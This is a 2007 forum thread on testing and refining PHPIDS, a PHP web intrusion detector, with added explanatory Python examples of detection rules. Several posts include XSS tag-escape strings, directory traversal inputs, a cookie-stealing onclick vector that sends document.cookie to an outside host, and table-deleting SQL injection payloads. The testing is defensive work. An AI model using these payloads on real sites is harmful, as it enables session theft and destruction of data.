Re: WebApp IDS
Posted by: Anonymous User
Date: May 13, 2007 06:29AM

Yeah I tried that one out also, typing around my ASCII pad ^^, but if you mix it with nulls or > < it will. I guess they allow such chars because of locales, cause every language should be able to use this thing.

Re: WebApp IDS
Posted by: Anonymous User
Date: May 13, 2007 09:39AM

@Ronald & Hong: Yes - exactly. But - do you see any problems in not detection vwe? I don't yet but maybe I miss the forest for the trees.

Thanks!
.mario

Re: WebApp IDS
Posted by: Martin
Date: May 21, 2007 04:22PM

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

I don't know if this counts or not - it escapes the a href no quotes - which is definitely malicious input although not of a high severity.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: WebApp IDS
Posted by: Anonymous User
Date: May 23, 2007 06:58AM

@Martin: Thanks a lot! Modified the rules...

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

Greetings,
.mario

Re: WebApp IDS
Posted by: Martin
Date: May 23, 2007 03:23PM

@.mario - it's still escapable via http://phpids.heideri.ch/?test=%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!!

I'm not sure how this can be detected really, unless you disallow >, but this is essentially allowing a malicious individual to write their content onto the page - ie. could forge a link to "login".


Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 02:21AM

@Martin: Well - I think it would create tons of false positives to detect the single occurrence of the greater-than character - also you can just escape when the surrounding HTML is really bad. Furthermore you could inject anything active/executable without being noticed, so I guess it makes sense to just leave the filter as it is in this case.

Maybe it would make sense to detect character sequences like >[\s\w]</\w> - so you could make sure it is really an attempt to close an open tag/escape an attribute.

What do you think?



Edited 1 time(s). Last edit at 05/24/2007 09:57AM by .mario.

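To make the false-positive trade-off discussed in these two posts concrete, here is an added example (written for this page, not PHPIDS code) that runs the naive "any >" rule next to a sequence rule in the spirit of .mario's >[\s\w]</\w> proposal and an unquoted-attribute-escape rule. The quantifiers and extra punctuation in the sequence rule are my reading of the proposal, the sample inputs are constructed from the two payloads above plus some harmless text containing ">".

```python
import re
from html import unescape
from urllib.parse import unquote

# Rule 1: the naive approach discussed in the thread, flag any '>' at all.
NAIVE_GT = re.compile(r">")

# Rule 2: my reading of .mario's sequence proposal (>[\s\w]</\w>): a '>' that
# closes the surrounding element, some injected text, then a closing tag.
# Quantifiers and the extra punctuation are assumptions, not a PHPIDS rule.
TAG_ESCAPE = re.compile(r">[\s\w!,.]*</\w+>", re.IGNORECASE)

# Rule 3: breaking out of an unquoted attribute value, as in Martin's
# 'a href with no quotes' report: '/>' or '>' followed by a fresh opening tag.
ATTR_ESCAPE = re.compile(r"/?>\s*[\w\s!]*<\w+[\s>]", re.IGNORECASE)


def normalize(value: str) -> str:
    """Percent-decode twice (catches double encoding) and decode HTML entities,
    so the rules see the characters a browser would render."""
    return unescape(unquote(unquote(value)))


def classify(value: str) -> dict:
    """Return which of the three rules fire for one parameter value."""
    text = normalize(value)
    return {
        "naive_gt": bool(NAIVE_GT.search(text)),
        "tag_escape": bool(TAG_ESCAPE.search(text)),
        "attr_escape": bool(ATTR_ESCAPE.search(text)),
    }


def false_positives(rule: str, benign_samples) -> int:
    """Count how many benign values a rule flags; used to compare the rules."""
    return sum(1 for s in benign_samples if classify(s)[rule])


# Constructed samples: the two payloads from this thread, plus harmless text
# that legitimately contains '>'.
ESCAPES = [
    "test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22",
    "%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!!",
]
BENIGN = ["5 > 3", "if x -> y then z", "price > 100 EUR", "hello world"]

if __name__ == "__main__":
    for sample in ESCAPES + BENIGN:
        print(repr(normalize(sample)), classify(sample))
    for rule in ("naive_gt", "tag_escape", "attr_escape"):
        print(rule, "false positives on benign:", false_positives(rule, BENIGN))
```

The naive rule flags three of the four benign strings, the two sequence rules flag none of them, and between them they still catch both payloads: the first (no quotes around the href) trips the attribute-escape rule, the second (closing the anchor) trips the tag-escape rule.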
Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 04:12AM

@.mario - firstly, I apologise for those !!!!s after the URL - they were meant to be part of it hehe.

I agree that catching > will generate too many false positives. Maybe this is one that will just have to be let go - I mean you can write a new attribute simply by putting a space after some text in the a href no quotes.


Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 10:00AM

@Martin - no problem - I can live with the !!!s ;)

Let's conclude that good protection can only result from a minimum of code quality - which is definitely not given with pseudo HTML lacking attribute delimiters etc. - and as mentioned, even if someone would manage to break out undetected, the code afterwards would be detected for sure.

Thanks for your input!

Greetings,
.mario

Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 10:56AM

Hi!

@Martin: I think I found a way to filter the above mentioned input without creating too many false alerts.

@all: I just updated the filter rules and the smoke test - now the PHP IDS should be capable of detecting all possible fullwidth/halfwidth encoding attacks - also I improved the performance of the regex rules and changed some minor details regarding the impact of some rules (SQLi detection got a 5, detection of attributes in closed tags got a three)

We are heading straight towards the first public release - currently I am working on our intranet structure together with some group members and trying to create a page design including logo etc.

We'll soon have the beta of the PHP IDS running on three high traffic platforms (formerly one) and expect another increase of quality due to the information we'll hopefully get.

I'll keep you informed about the state of the IDS - thanks for all the testing and the input!
(and please keep testing like hell *g* )

Greetings!
.mario


<edit> next post is no. 100 in this thread - go get it! ;) </edit>



Edited 1 time(s). Last edit at 05/24/2007 10:57AM by .mario.

Re: WebApp IDS
Posted by: thrill
Date: May 24, 2007 12:03PM

100th post!

j/k..

@.mario - I haven't had a chance to take a look at the updated instructions. Been busy at work. But I'm hoping this weekend will give me a chance to put the ids on the beta site I set up. If all goes well there, I'll deploy it on other sites I have, including http://www.createasmilefoundation.org which already has over 36000 hits, so it'd be a nice site to test its sturdiness.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 02:35PM

What about detecting directory traversals (../) which could be useful when trying to avoid LFI vulnerabilities?


Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 03:10PM

@thrill: Congrats for the 100th post! ;) Regarding your applications: Nice! I am looking forward to that - if you need support just drop me or christ1an a line via PM/mail or the google group - I should be online the whole weekend although not that frequently 'cause I'm gonna visit my family.

@Martin: A basic check for DT is already included - give it a try!

Greetings!
.mario

Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 03:51PM

@.mario - I tried http://phpids.heideri.ch/?test=/../thisfile and it triggered no warnings that this was dangerous input... is that what you meant?


Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 04:20PM

@Martin: Yes

http://phpids.heideri.ch/?test=/../../thisfile

That works and worked - yours will work tomorrow ;)
Thanx!

Re: WebApp IDS
Posted by: beford
Date: May 24, 2007 04:29PM

http://phpids.heideri.ch/?test=\..\..\..\thisfile

Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 05:00PM

Phew - couldn't get my hands off. Now even obfuscated directory traversal (using unicode, hex-entities, etc.) should be detected.

Good n8!
.mario

p.s. @beford: damn - I forgot windows ;)



Edited 1 time(s). Last edit at 05/24/2007 05:01PM by .mario.

Re: WebApp IDS
Posted by: beford
Date: May 25, 2007 01:44AM

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22window.location='ht'%2b'tp://google.com/?'%2bdocument.cookie

Affects
Firefox 2.x < 2.0.0.2
Firefox 1.5x < 1.5.10

:P

Re: WebApp IDS
Posted by: Anonymous User
Date: May 25, 2007 03:31AM

@beford: wow - impressive. thx!

FIXED

Re: WebApp IDS
Posted by: Martin
Date: May 25, 2007 03:55PM

I've done the initial work on a port to .NET (c#). Work is at http://code.google.com/p/dotnetids/

Missing:

Complete XMLDOC comments
Some IEnumerable implementations

Still, it works, here's a test page using it:

IDS.IDS ids = new IDS.IDS(Request.QueryString);
ids.Run();

Label1.Text = "Total Impact: " + ids.Report.Impact.ToString();

foreach (IDS.Event ev in ids.Report.Events)
{
    // Append (not assign) so a request with several flagged parameters lists all of
    // them, and encode the parameter name since it comes from the request itself.
    Label2.Text += "Param " + Server.HtmlEncode(ev.Name) + " failed " + ev.Filters.Count + " filters:<br/><br/>";

    foreach (Filter f in ev.Filters)
    {
        Label2.Text += "Filter: " + f.Description + "<br/>";
        Label2.Text += "Rule: " + Server.HtmlEncode(f.Rule) + "<br/>";
        Label2.Text += "Impact: " + f.Impact.ToString() + "<br/><br/>";
    }
}

I'm away for the next week but will do some more on it when I'm back - and after celebrating my birthday - which is tomorrow!

Have fun all!


Re: WebApp IDS
Posted by: kishord
Date: May 28, 2007 06:44AM

beford's vector is still not fixed

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

onWHATEVER.=
may be a better way to go.

Re: WebApp IDS
Posted by: kishord
Date: May 28, 2007 07:58AM

There should not be only a . after
onWHATEVER (xxtp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie
also works)

I guess we will need to enumerate all such characters that work.

Do you know the list, beford?

Web Application Security Journ(ey)al

Re: WebApp IDS
Posted by: beford
Date: May 29, 2007 03:03AM

http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
http://ha.ckers.org/xss.html#XSS_Non_alpha_non_digit2

You probably want to filter out document.location, top.location, self.location



Edited 1 time(s). Last edit at 05/29/2007 03:04AM by beford.

Re: WebApp IDS
Posted by: Anonymous User
Date: May 29, 2007 04:48AM

Hi!

Thanks guys - FIXED!

http://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

I will lock myself in the next days and optimize the SQL injection detection - there's still plenty of work to do...

Greetings,
.mario

Re: WebApp IDS
Posted by: christ1an
Date: May 31, 2007 01:29PM

We have enhanced the SQL Injection detection vectors again. I would appreciate it if anyone would try to inject malicious code.

http://phpids.heideri.ch/?test=xxx

Thanks!

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Re: WebApp IDS
Posted by: Anonymous User
Date: June 03, 2007 09:48PM

This will pass: 1 AND(DELETE FROM LOGIN)

Integer SQL injection, which deletes table, or inserts.

is exploitable like this:

# weak query: integer SQL injection (the unquoted id is interpolated straight into the SQL)
$sql = "SELECT * FROM LOGIN WHERE id = {$_POST['id']} ";

# exploit result
$sql = "SELECT * FROM LOGIN WHERE id = 1 AND(DELETE FROM LOGIN) "; // pow!

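The post above shows why an integer context needs no quote character to alter the query. As an added example (my own code, not Ronald's PHP and not a PHPIDS rule), here is a small detection heuristic for that shape of value next to the application-side fix, strict type validation plus a bound parameter, run against a constructed in-memory table standing in for LOGIN.

```python
import re
import sqlite3

# Constructed heuristic: a value that should be a bare integer but carries
# AND/OR followed by a parenthesised expression, as in '1 AND(DELETE FROM LOGIN)'.
# It targets the integer-context case only; quoted-string payloads are out of scope.
INT_CONTEXT_INJECTION = re.compile(r"^\s*-?\d+\s*(?:AND|OR)\s*\(", re.IGNORECASE)


def looks_like_integer_injection(value: str) -> bool:
    return INT_CONTEXT_INJECTION.search(value) is not None


def build_query_unsafe(raw_id: str) -> str:
    """The vulnerable pattern from the post: the raw parameter is pasted into an
    unquoted integer position, so the SQL text itself changes."""
    return f"SELECT * FROM login WHERE id = {raw_id}"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the LOGIN table in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, user TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_safe(conn: sqlite3.Connection, raw_id: str):
    """Validate the type first, then bind the value; the SQL text never changes.
    Returns the matching row, or None when the input is not an integer."""
    try:
        ident = int(raw_id)          # int() rejects '1 AND(DELETE FROM LOGIN)'
    except ValueError:
        return None                  # reject without touching the database
    return conn.execute("SELECT user FROM login WHERE id = ?", (ident,)).fetchone()


def row_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM login").fetchone()[0]


if __name__ == "__main__":
    payload = "1 AND(DELETE FROM LOGIN)"
    print("flagged by heuristic:", looks_like_integer_injection(payload))
    print("unsafe query would be:", build_query_unsafe(payload))
    conn = make_db()
    print("safe lookup of '1':", lookup_safe(conn, "1"))
    print("safe lookup of payload:", lookup_safe(conn, payload))
    print("rows left:", row_count(conn))
```

The point of the second half is that the IDS rule is a second line of defence: with int() in front of a bound parameter the payload never reaches the database at all, so the table still has its two rows afterwards.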
Re: WebApp IDS
Posted by: Anonymous User
Date: June 03, 2007 09:56PM

And a few theoretical ones:

1' \x0 AND(INSERT INTO LOGIN SET USER = CONCAT(CHAR(39),CHAR(07),CHAR(39)) '

1' \x0 AND(INSERT INTO LOGIN SET USER = 0x00000 )

Re: WebApp IDS
Posted by: Anonymous User
Date: June 04, 2007 04:57AM

Hi Ronald!

Thanks a lot - I will update the filter ASAP...

<edit>
FIXED
...and btw - the URL for the smoketest finally changed
http://demo.phpids.org/?test=1'%20\x0%20AND(INSERT%20INTO%20LOGIN%20SET%20USER%20=%200x00000%20)
</edit>

Grx,
.mario



Edited 2 time(s). Last edit at 06/04/2007 05:14AM by .mario.

Re: WebApp IDS
Posted by: [k]
Date: June 13, 2007 02:37AM

I'm very keen to test this - while you tackle your server issues, is there (or would you like) a mirror?

Re: WebApp IDS
Posted by: Anonymous User
Date: June 13, 2007 03:24AM

Hi!

We're back - Trac and forum are still down but you can use the page and downloads again. I guess by tomorrow the whole estate should be working again.

http://php-ids.org/

Thanks for your support!
.mario

Re: WebApp IDS
Posted by: Martin
Date: June 15, 2007 09:06AM

Just a quick note about .NETIDS which I really want to share!

There is now support on the SmokeTest for detection of fragmented XSS attacks!

I posted full details at http://the-mice.co.uk/switch/index.php/archives/27

but a basic example can be found at:

http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=Hello%20&param2=this%20&param3=is%20a%20test!
and
http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=%3C&param2=script&param3=%3E

Please try and stress this feature and let me know if you break it!

Thanks,

Martin


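Two detection ideas from this thread fit naturally into one added example (my own code, not the .NETIDS or PHPIDS implementation): the fragmented XSS check Martin describes, where param1=%3C, param2=script and param3=%3E are harmless on their own and only form <script> once the parameters are joined in request order, and the event-handler rule kishord and beford discussed, where a non-alphanumeric character may sit between on<event> and the equals sign (the MFSA 2007-02 / ha.ckers.org non-alpha-non-digit family), plus the document/top/self.location filtering beford suggested. The rules and the sample requests are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed rules for this example; they are not the PHPIDS or .NETIDS rule sets.
RULES = {
    # opening script tag, whitespace tolerated after '<'
    "script tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    # on<event> with up to a few non-word characters before '=' (onclick`=, onclick.=),
    # the family behind MFSA 2007-02 / the ha.ckers.org non-alpha-non-digit entry
    "event handler": re.compile(r"\bon\w+[^\w=]{0,8}=", re.IGNORECASE),
    # assignment to (document|top|self|window).location or to bare location
    "location assignment": re.compile(
        r"\b(?:(?:document|top|self|window)\s*\.\s*)?location\s*=", re.IGNORECASE),
}


def scan_value(value: str) -> list:
    """Names of the rules that fire on a single decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def scan_request(query: str) -> dict:
    """Check every parameter on its own, then the values joined in request order,
    so a payload split across parameters is still seen as one string."""
    params = parse_qsl(query, keep_blank_values=True)   # also percent-decodes
    per_param = {name: scan_value(value) for name, value in params}
    joined = "".join(value for _, value in params)
    return {"per_param": per_param, "fragmented": scan_value(joined)}


# Constructed requests: Martin's two SmokeTest examples and beford's onclick vector.
REQUESTS = [
    "param1=Hello%20&param2=this%20&param3=is%20a%20test!",
    "param1=%3C&param2=script&param3=%3E",
    "test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie",
]

if __name__ == "__main__":
    for q in REQUESTS:
        print(q, "->", scan_request(q))
```

For the second request every per-parameter list is empty and only the "fragmented" list carries "script tag"; for beford's vector the single parameter trips both the event-handler and the location rule. The event-handler rule is deliberately loose and will also fire on an ordinary value such as "one=1", which is the usual false-positive cost of that family of patterns.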